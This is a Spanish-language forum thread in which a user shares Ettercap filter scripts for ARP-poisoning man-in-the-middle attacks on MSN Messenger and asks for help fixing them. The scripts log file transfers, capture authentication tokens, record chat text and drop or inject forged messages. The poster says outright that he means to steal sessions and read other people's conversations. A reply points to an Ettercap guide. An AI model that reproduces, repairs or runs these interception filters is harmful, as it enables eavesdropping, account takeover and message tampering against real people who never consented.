grancerote

buenas seniores de dragon jar la verdad no soy muy posteador casi simpre intneto de arreglarmelas pormi mismo pero parece q estoy atascado,
EEn este momento esoty jugando con ETTERCAP una exelente herramienta para el ARP poisoning.

En trandole al tema he intentado crear filtros en los cuales he tenia exito pero npo entodos, uno de mis proyectos fue filtrar el msn y cree esto>


if (ip.proto == TCP && search(DATA.data, "SessionID") ) {
if (ip.src == 6891 || ip.dst == 6891) {
log(DATA.data, "/tmp/msn.P2P.log");
msg("Data en transferencia\n");
}
} # Estew filtro deberia de tomar todos los files en transferncia pero no melos agarra yo se que el session ID es parte de los paketes de tranferencia pero sigo teniaendo problemas!! alguien sabe como tomar los paquetes de msn tranferidos o saben como recontruirlos osi puedo cambiar de file y remplazarlo por uno mio jheheheh






if (ip.proto == TCP && search(DATA.data, "MSPAuth") ) {
log(DATA.data, "/tmp/loggin.log");
msg("Logging Logged!!\n");
}
# Este otor lo que hace es tomar los paquetes donde se encuentra la authenticacion de msn pero todabia no se como desencriptarlo alguien por la comunidad no tendraa una idea de como o si podria usarlo para logearme yo y robar su session jejeje XD


if (tcp.src == 1863 || tcp.dst == 1863) {
log(DATA.data, "/tmp/msn.chat.v3.log");
msg("Texto plano MSN save!XD\n");
}
} # este si me funciona a la perfeccion para robar las conversaciones del msn asi podemos ver que chatean jejeje
################################

if (ip.proto == TCP && search(DATA.data, "MSG") ) {
if (tcp.src == 1863 || tcp.dst == 1863) {
msg("Msn Debug logged!\n");
drop();
inject("/tmp/repalcetxt.msn");
msg("Msg Drop and injectted succesful!!\n");
}
} Se supone q este tendria q reemplazar el msg con el que tengo setiado en el repalcetxt.msn pero no pasa nada mas bien o llega msgs del todo!! el archivo a injectar tiene q ser un script o un msg modificado___??

Yo lo que hice fue tomar un msg y solo le cambie el texto del msg por :msg hacked: y lo guarde en el archivo pero no pasa nada por favor un ejemplo o q tengo q hacer para enterder el inject command!!! gracias
################################################## ###

if (ip.proto == TCP && tcp.src == 1863 && tcp.dst == 1863) {
log(DATA.data, "/tmp/allmsntxt.log");
msg("Appending to ALLMSN TXT\n");
}
if (ip.proto == TCP && tcp.src == 6891 && tcp.dst == 6891) {
log(DATA.data, "/tmp/allmsnP2P.log");
msg("Appending to ALLP2P Log\n");
}
Estos deberian de tomar todo el trafico q pasas por esos puertos pero no pasa nada!! no se crean ni los archivos en tmp alguna idea???

les agradesco cualquier ayuda

Seifreed

Pásate por aqui
Jugando con Ettercap - Wiki.AdictoLinux.Org

__________________
Mi web:
http://www.seifreed.net
Asociación cultural y tecnológica:
http://www.badiatech.org
Cursos de informática:
aula.badiatech.org
Wikipedia asociación:
wiki.badiatech.org

grancerote

Gracias!! se agradese el de mailing esta interesante!!!

por casualidad tu no tienes conosimientos en la variable inject todavia no he dado en como utilizarla jeje !!